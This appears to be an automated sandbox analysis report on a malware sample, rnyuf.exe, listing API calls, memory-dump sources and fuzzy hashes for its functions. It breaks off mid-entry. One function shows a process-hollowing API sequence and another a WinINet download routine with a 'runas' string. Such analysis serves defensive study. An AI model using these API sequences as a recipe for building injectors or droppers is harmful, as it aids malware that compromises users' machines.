Function 0288798C, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,02887AF1,00000000,?,0288E458,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 028879A2
GetLastError.KERNEL32(?,0288E458,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,02887AF1,00000000,00000104,?), ref: 028879AC
__dosmaperr.LIBCMT ref: 028879B3

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 6190189ddc8ea3ca9bc940537e496306eefee21a36299e640c24df3594615067
Instruction ID: ee948c2bee7a12e796a28fe5b7e541268d67c58293df0b5b8ff3acc667abb159
Opcode Fuzzy Hash: 6190189ddc8ea3ca9bc940537e496306eefee21a36299e640c24df3594615067
Instruction Fuzzy Hash: 20F03C3E600115BB8B213FA6DC08D5AFF7AFF896A53208561F61DD6520DB35E861CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 028879F5, Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,00000000,00000000,02887AF1,00000000,?,0288E3E3,00000000,00000000,02887AF1,?,?,00000000,00000000,00000001), ref: 02887A0B
GetLastError.KERNEL32(?,0288E3E3,00000000,00000000,02887AF1,?,?,00000000,00000000,00000001,00000000,00000000,?,02887AF1,00000000,00000104), ref: 02887A15
__dosmaperr.LIBCMT ref: 02887A1C

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 5f6eea01c1270f9e0c5a23a19c9b8f8dac992b5886479b52405833e54fea6283
Instruction ID: a15e86443fff2091ddcf62751679e71300e47186c64ca31666c0e0b060716732
Opcode Fuzzy Hash: 5f6eea01c1270f9e0c5a23a19c9b8f8dac992b5886479b52405833e54fea6283
Instruction Fuzzy Hash: EBF04B3E600155BB8B206FB6CC08D5AFFBAFE442A43108520E629D6120CB31E921CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00421B95, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00403D80,74B06490,0042E0B8,00000000,00403D80,?,0041EFD2,00403D80,00000001,00403D80,00403D80,?,0041882C,00000000,?,00403D80), ref: 00421BAC
GetLastError.KERNEL32(?,0041EFD2,00403D80,00000001,00403D80,00403D80,?,0041882C,00000000,?,00403D80,00000000,00403D80,?,00418D80,00403D80), ref: 00421BB8

Part of subcall function 00421B7E: CloseHandle.KERNEL32(FFFFFFFE,00421BC8,?,0041EFD2,00403D80,00000001,00403D80,00403D80,?,0041882C,00000000,?,00403D80,00000000,00403D80), ref: 00421B8E

___initconout.LIBCMT ref: 00421BC8

Part of subcall function 00421B40: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00421B6F,0041EFBF,00403D80,?,0041882C,00000000,?,00403D80,00000000), ref: 00421B53

WriteConsoleW.KERNEL32(00403D80,74B06490,0042E0B8,00000000,?,0041EFD2,00403D80,00000001,00403D80,00403D80,?,0041882C,00000000,?,00403D80,00000000), ref: 00421BDD

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 84c3088fa30d72e096a5c50f6d0c6a96ef9fbb6349433aca8dd31943ec956f96
Instruction ID: 7508bf37c0b866eb48b8223dddbefd80bf7eec2c8aa76b175be5957b4052d3e7
Opcode Fuzzy Hash: 84c3088fa30d72e096a5c50f6d0c6a96ef9fbb6349433aca8dd31943ec956f96
Instruction Fuzzy Hash: 3BF01C36204125BBCF221FE2EC14E8A3F26FF587A0F814065FB1889131D6329820DB98

Uniqueness

Uniqueness Score: -1.00%

Function 02891DE5, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(02873FD0,?,0042E0B8,00000000,02873FD0,?,0288F222,02873FD0,00000001,02873FD0,02873FD0,?,02888A7C,00000000,?,02873FD0), ref: 02891DFC
GetLastError.KERNEL32(?,0288F222,02873FD0,00000001,02873FD0,02873FD0,?,02888A7C,00000000,?,02873FD0,00000000,02873FD0,?,02888FD0,02873FD0), ref: 02891E08

Part of subcall function 02891DCE: CloseHandle.KERNEL32(00430930,02891E18,?,0288F222,02873FD0,00000001,02873FD0,02873FD0,?,02888A7C,00000000,?,02873FD0,00000000,02873FD0), ref: 02891DDE

___initconout.LIBCMT ref: 02891E18

Part of subcall function 02891D90: CreateFileW.KERNEL32(0042C074,40000000,00000003,00000000,00000003,00000000,00000000,02891DBF,0288F20F,02873FD0,?,02888A7C,00000000,?,02873FD0,00000000), ref: 02891DA3

WriteConsoleW.KERNEL32(02873FD0,?,0042E0B8,00000000,?,0288F222,02873FD0,00000001,02873FD0,02873FD0,?,02888A7C,00000000,?,02873FD0,00000000), ref: 02891E2D

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 84c3088fa30d72e096a5c50f6d0c6a96ef9fbb6349433aca8dd31943ec956f96
Instruction ID: a987bfc0708f50ffa43466bca554e9d485c1c702345f02d5c0de5dce7fd4ae8f
Opcode Fuzzy Hash: 84c3088fa30d72e096a5c50f6d0c6a96ef9fbb6349433aca8dd31943ec956f96
Instruction Fuzzy Hash: 40F01C3A505216BBCF222FA5DC18A9D3F2AFF487A0F054460FA1C85131C7329821DB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041583C, Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00415845

Part of subcall function 00416601: HeapFree.KERNEL32(00000000,00000000,?,0041C89A,00000000,00000000,00000000,E8004310,?,0041C8C1,00000000,00000007,00000000,?,0041CCC3,00000000), ref: 00416617
Part of subcall function 00416601: GetLastError.KERNEL32(00000000,?,0041C89A,00000000,00000000,00000000,E8004310,?,0041C8C1,00000000,00000007,00000000,?,0041CCC3,00000000,00000000), ref: 00416629

_free.LIBCMT ref: 00415858
_free.LIBCMT ref: 00415869
_free.LIBCMT ref: 0041587A

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f77b1edf2f146029598b022106a51b758e869ce2ae8a8939e6b36c6bfe3d8da7
Instruction ID: bac838c32c678229fa3b4a483e54889a55cc49d4a7793ec83d9a9c3f6b142d6f
Opcode Fuzzy Hash: f77b1edf2f146029598b022106a51b758e869ce2ae8a8939e6b36c6bfe3d8da7
Instruction Fuzzy Hash: 57E0EC79824160DA8B067F66BC85489BFF2F74AB15302683BF45052231CB3B55A69F8D

Uniqueness

Uniqueness Score: -1.00%

Function 00414EAB, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe, xrefs: 00414EEE, 00414EF5, 00414F2B

Memory Dump Source

Source File: 00000021.00000002.510506944.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000021.00000002.511297854.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
API String ID: 0-1917590862
Opcode ID: dbf4133003f6798f14a9742b0dc153d90624e20bb6cb4096486228c3d4d93f74
Instruction ID: 7b11db002fd7e9e53be5450ed18239a6e5ba10cc8c9f17be66461777073e512c
Opcode Fuzzy Hash: dbf4133003f6798f14a9742b0dc153d90624e20bb6cb4096486228c3d4d93f74
Instruction Fuzzy Hash: 37417071A00219ABDB15EF9ADC81DEEBBF8EBC5310F14006BF404E7351D7799A828798

Uniqueness

Uniqueness Score: -1.00%

Function 028850FB, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe, xrefs: 0288513E, 02885145, 0288517B

Memory Dump Source

Source File: 00000021.00000002.515410996.0000000002870000.00000040.00000001.sdmp, Offset: 02870000, based on PE: false

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe
API String ID: 0-1917590862
Opcode ID: f30cd9fe090fa8c8f9aa4695388f2e3af2898a0ad63669a9c4136ee8a0ecb8fb
Instruction ID: d9cb1e3e026fd1b0326cd7209ec4afec931af5647600920a265ef73f4e0514e6
Opcode Fuzzy Hash: f30cd9fe090fa8c8f9aa4695388f2e3af2898a0ad63669a9c4136ee8a0ecb8fb
Instruction Fuzzy Hash: 1641C27DE00219AFCB26FB9D9C809AEBBF9FF85310F55006AE408D7250EB749A41CB55

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rnyuf.exe PID: 5224 Parent PID: 528 rnyuf.exeCOMMON

Executed Functions

Function 004121C1, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,004121C0,?,?,?,?,?,00413272), ref: 004121E3
TerminateProcess.KERNEL32(00000000,?,004121C0,?,?,?,?,?,00413272), ref: 004121EA
ExitProcess.KERNEL32 ref: 004121FC

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 564a7c50184922bb4ee37248741d8938a7ae000a36ef65aaaaf5d7c3017608b9
Instruction ID: 111b8f99c5e8c18c38b779f89b6e7db285fb5e85f839abb1f05a8a0ef34853dc
Opcode Fuzzy Hash: 564a7c50184922bb4ee37248741d8938a7ae000a36ef65aaaaf5d7c3017608b9
Instruction Fuzzy Hash: D2E0EC31104548AFCF216F55DD49A9A3B69FF44341B404425F915C6331CB79EDE2DB8C

Uniqueness

Uniqueness Score: -1.00%

Function 00401DA0, Relevance: 27.2, APIs: 18, Instructions: 157memoryCOMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 00401DCA
GetProcessHeap.KERNEL32(00000008,?), ref: 00401DDF
HeapAlloc.KERNEL32(00000000), ref: 00401DE2
GetUserNameW.ADVAPI32(00000000,?), ref: 00401DF0
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00401E13
GetProcessHeap.KERNEL32(00000008,?), ref: 00401E1E
HeapAlloc.KERNEL32(00000000), ref: 00401E21
GetProcessHeap.KERNEL32(00000008,?), ref: 00401E31
HeapAlloc.KERNEL32(00000000), ref: 00401E34
LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00401E5E
ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00401E71
GetProcessHeap.KERNEL32(00000000,?), ref: 00401F02
HeapFree.KERNEL32(00000000), ref: 00401F0B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401F10
HeapFree.KERNEL32(00000000), ref: 00401F13
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401F1A
HeapFree.KERNEL32(00000000), ref: 00401F1D
LocalFree.KERNEL32(00000000), ref: 00401F22

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
String ID:
API String ID: 3326663573-0
Opcode ID: 818830a1ea73f43010473f1a44742f07b3734f780869d80c542b0568ac57b26b
Instruction ID: 4a6e7371212e4031177453ca6cee8a06f2b2f205882cb2db8d7ee7705e149be0
Opcode Fuzzy Hash: 818830a1ea73f43010473f1a44742f07b3734f780869d80c542b0568ac57b26b
Instruction Fuzzy Hash: D0516175E00209ABDB209FA5DC85FAFBBBCEF44344F10056AED05A3290DB749E05CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041DBF8, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

Part of subcall function 0041D8B1: CreateFileW.KERNELBASE(00000000,00000000,?,0041DCA1,?,?,00000000,?,0041DCA1,00000000,0000000C), ref: 0041D8CE

GetLastError.KERNEL32 ref: 0041DD0C
__dosmaperr.LIBCMT ref: 0041DD13
GetFileType.KERNELBASE(00000000), ref: 0041DD1F
GetLastError.KERNEL32 ref: 0041DD29
__dosmaperr.LIBCMT ref: 0041DD32
CloseHandle.KERNEL32(00000000), ref: 0041DD52
CloseHandle.KERNEL32(0041649E), ref: 0041DE9F
GetLastError.KERNEL32 ref: 0041DED1
__dosmaperr.LIBCMT ref: 0041DED8

Strings

H, xrefs: 0041DE5D

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 7b29262b32dc82f416ec04a4e2ce346f5ec378c28730e20a5315283c697878fc
Instruction ID: f45d129419b544019537036c6fdf8d8cb41214967f35cc648163b538a8bd5e7e
Opcode Fuzzy Hash: 7b29262b32dc82f416ec04a4e2ce346f5ec378c28730e20a5315283c697878fc
Instruction Fuzzy Hash: 7CA12572E041449FCF199F68DC517EE7BB1AB0A324F14015EE811AF3A1DB389987CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041B965, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0041B70E: GetOEMCP.KERNEL32(00000000,0041B980,?,?,r2A,00413272,?), ref: 0041B739

_free.LIBCMT ref: 0041B9DD

Strings

r2A, xrefs: 0041B96D

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free
String ID: r2A
API String ID: 269201875-1151287387
Opcode ID: d3c2e2b88ba77118989c4c7aa994530429e2dc194af46c0dbcad9a8dc80144ee
Instruction ID: c31fe65048a6d0049e1a254771c6add704eeb6c00d063b1d8e6c367a93677541
Opcode Fuzzy Hash: d3c2e2b88ba77118989c4c7aa994530429e2dc194af46c0dbcad9a8dc80144ee
Instruction Fuzzy Hash: F8319071904249AFCB01DFAAD841ADB7BB4EF44314F11416BF910972A1EB3ADD91CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404AF0, Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?), ref: 00404B0D

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 09616a6f874455e3bbb770e675ae5379302030ee058b89419f8129cdcba0776c
Instruction ID: 58bf03ab494b85353edd63a8fa63f728d2a838929c325534efda30f4b13b400f
Opcode Fuzzy Hash: 09616a6f874455e3bbb770e675ae5379302030ee058b89419f8129cdcba0776c
Instruction Fuzzy Hash: 3A612470E00208ABDF04EFA9D895BEEBBB9EF44304F50416EE501772C1DB396A45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041EAAA, Relevance: 4.6, APIs: 3, Instructions: 79COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EB1D
_free.LIBCMT ref: 0041EB73

Part of subcall function 0041E94F: _free.LIBCMT ref: 0041E9A7
Part of subcall function 0041E94F: GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0042B608), ref: 0041E9B9

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 90ccf33aaea71f3aeab9e788c7400fb84db06d016ee52be677b410b2edf51356
Instruction ID: ace21171c3c18d66e1851376e7815d4a61efc0610b71bac9099fccd9b772e005
Opcode Fuzzy Hash: 90ccf33aaea71f3aeab9e788c7400fb84db06d016ee52be677b410b2edf51356
Instruction Fuzzy Hash: F421497590412896C730E7279C81EEBB3688F40324F1102ABED96A2181DA38ADC1899D

Uniqueness

Uniqueness Score: -1.00%

Function 00416AEA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,r2A,0041B9A2,00000220,?,?,?,?,?,?,00413272,?), ref: 00416B1C

Strings

r2A, xrefs: 00416AEC

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID: r2A
API String ID: 1279760036-1151287387
Opcode ID: 771907b035423c1bfb91999cebcd125318033df7f4ea23700c973a18032403a7
Instruction ID: 31e6bcfa576d0f434f4f1c8ade444fe157d4e811e5a74eca956fd670acc5e426
Opcode Fuzzy Hash: 771907b035423c1bfb91999cebcd125318033df7f4ea23700c973a18032403a7
Instruction Fuzzy Hash: 2EE0EC3124913166D63026569C00FDB3B889F413A1F03013BFC05D6290EB5CFC8185DD

Uniqueness

Uniqueness Score: -1.00%

Function 00407F93, Relevance: 3.2, APIs: 2, Instructions: 186COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,00000000), ref: 00407FA5
GetFileAttributesA.KERNEL32(?), ref: 00407FB7

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 7a26ffee92a1e1a9094ac31e9793512ad2f964fde108841a696d0c03e7042ea4
Instruction ID: dd94078e1362e8be217e1f4c45a893a6c9e394bba6d9c0feb1553209f5e5b736
Opcode Fuzzy Hash: 7a26ffee92a1e1a9094ac31e9793512ad2f964fde108841a696d0c03e7042ea4
Instruction Fuzzy Hash: F4515B71A001085BDB08EB78CE86B9D7736EF46314F54453EF844B72C2DA3DD9854B99

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE0, Relevance: 3.1, APIs: 2, Instructions: 96synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00404E41
GetLastError.KERNEL32(?,00000000), ref: 00404E47

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastMutex
String ID:
API String ID: 1925916568-0
Opcode ID: f2edb617530031ab040853ed43d5fc06b6745c5f868da634a599d2119f279b29
Instruction ID: 2e9549398049608871f2d66a8051869272746d0e27d8f52d4ac77c378fe54d7e
Opcode Fuzzy Hash: f2edb617530031ab040853ed43d5fc06b6745c5f868da634a599d2119f279b29
Instruction Fuzzy Hash: DF31F171A000099BCB18DF68C884BAEB7B1FF85301F60417AE211F76D1D73CAA858B98

Uniqueness

Uniqueness Score: -1.00%

Function 0041645F, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00416499

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: a9ccdfc2be8a8c5bf3af093da8c97f9743254d288b4b4ff1e7692456254f3035
Instruction ID: cc3595f79466ffb933f834505881ae592987a4573fa10b2810df313edb08b8ed
Opcode Fuzzy Hash: a9ccdfc2be8a8c5bf3af093da8c97f9743254d288b4b4ff1e7692456254f3035
Instruction Fuzzy Hash: 6F111871A0410AAFCF05DF58E9419DB7BF5EF48308F1540AAF809AB351D634E911CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041DB6A, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041DBCD

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9ba8c6d62c837557b7d10db139ff9f6489b14aed1980b721ae02a396919f42ec
Instruction ID: bdd6835059e051d86575645b9de8beb1e9075d51f21cadee273f298d98b7e4ab
Opcode Fuzzy Hash: 9ba8c6d62c837557b7d10db139ff9f6489b14aed1980b721ae02a396919f42ec
Instruction Fuzzy Hash: B5018FB2C05159BFCF01AFA8CC019EE7FB5AF08314F14016AF925E21A1E6359AA0DB84

Uniqueness

Uniqueness Score: -1.00%

Function 0041D8B1, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,0041DCA1,?,?,00000000,?,0041DCA1,00000000,0000000C), ref: 0041D8CE

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f4284ebefad32896ae27c04ba37a0df0535649db73f9f0f9d55800fa928cc254
Instruction ID: ceed89300155e818d6c5368a0feea72a114c098ece8793ea31281d03f641e89b
Opcode Fuzzy Hash: f4284ebefad32896ae27c04ba37a0df0535649db73f9f0f9d55800fa928cc254
Instruction Fuzzy Hash: C0D06C3210010DBFDF128F84DC06EDA3BAAFB48714F014110BA1856120C732E872EB94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00402250, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 155injectionthreadmemoryCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 0040226C
CreateProcessA.KERNEL32 ref: 004022C5
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 004022DE
GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 004022F3
ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 00402316
GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,00000000), ref: 0040232E
GetProcAddress.KERNEL32(00000000), ref: 00402335
VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 00402354
WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 0040236F
WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 004023AC
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 004023DC
SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 004023F2
ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 004023FB
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 00402409
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 00402420

Strings

ntdll.dll, xrefs: 00402329
NtUnmapViewOfSection, xrefs: 00402324

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 4033543172-1050664331
Opcode ID: 3078ffa1859de130ddeca60dbf4b09c62e6d23851e62b2b19299828d2c3f7800
Instruction ID: afd8631e990efc72bdc980619b5cc23537b0044600a19f4c07e0c489dac9edec
Opcode Fuzzy Hash: 3078ffa1859de130ddeca60dbf4b09c62e6d23851e62b2b19299828d2c3f7800
Instruction Fuzzy Hash: 2E516D71B40305BBEB209BA4DD85FAABB78FF08705F504065F608E62D0D7B4A955CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0041CB2C, Relevance: 19.6, APIs: 13, Instructions: 113COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0041CB70

Part of subcall function 0041C709: _free.LIBCMT ref: 0041C726
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C738
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C74A
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C75C
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C76E
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C780
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C792
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C7A4
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C7B6
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C7C8
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C7DA
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C7EC
Part of subcall function 0041C709: _free.LIBCMT ref: 0041C7FE

_free.LIBCMT ref: 0041CB65

Part of subcall function 00416601: HeapFree.KERNEL32(00000000,00000000,?,004156FE), ref: 00416617
Part of subcall function 00416601: GetLastError.KERNEL32(?,?,004156FE), ref: 00416629

_free.LIBCMT ref: 0041CB87
_free.LIBCMT ref: 0041CB9C
_free.LIBCMT ref: 0041CBA7
_free.LIBCMT ref: 0041CBC9
_free.LIBCMT ref: 0041CBDC
_free.LIBCMT ref: 0041CBEA
_free.LIBCMT ref: 0041CBF5
_free.LIBCMT ref: 0041CC2D
_free.LIBCMT ref: 0041CC34
_free.LIBCMT ref: 0041CC51
_free.LIBCMT ref: 0041CC69

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 6e6829f945fb38eee2558471d67fcd828d25534c293ea5dfe52bf9b8956759b2
Instruction ID: 0484ab9a63c19d17e320508f5cd372c79f8c2d53bff1b031fa99baee02996404
Opcode Fuzzy Hash: 6e6829f945fb38eee2558471d67fcd828d25534c293ea5dfe52bf9b8956759b2
Instruction Fuzzy Hash: 45314C716443009FEB21AA79EC86B97B3E9AF00315F11442BE458D6291DF39FCD0CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041A84A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

, xrefs: 0041AAD2

Memory Dump Source

Source File: 00000027.00000002.464069042.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000027.00000002.464209658.0000000000435000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 73ff1d946107a4cb8d2427b7e6bbdc4b23e8d13d0d7063bcbc566803723a9fcb
Instruction ID: 24c1fb8e07bb5d931e9e808705c566552b3b874c63d1b27013fbf30a24ce9d82
Opcode Fuzzy Hash: 73ff1d946107a4cb8d2427b7e6bbdc4b23e8d13d0d7063bcbc566803723a9fcb
Instruction Fuzzy Hash: 05C10970A092459FDF15DF99C881BEEBBB1AF49314F04405BE60497392D738ADD2CB2A

Uniqueness

Uniqueness Score: -1.00%

Function 00402430, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 004024D1
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 004024E3
InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 004024FA
InternetCloseHandle.WININET(00000000), ref: 0040250B
InternetCloseHandle.WININET(00000000), ref: 0040250E
InternetCloseHandle.WININET(00000000), ref: 0040251F
InternetCloseHandle.WININET(00000000), ref: 00402522

Strings

<, xrefs: 004026AC
runas, xrefs: 004026C5
Microsoft Internet Explorer, xrefs: 004024CC

Memory Dump Source

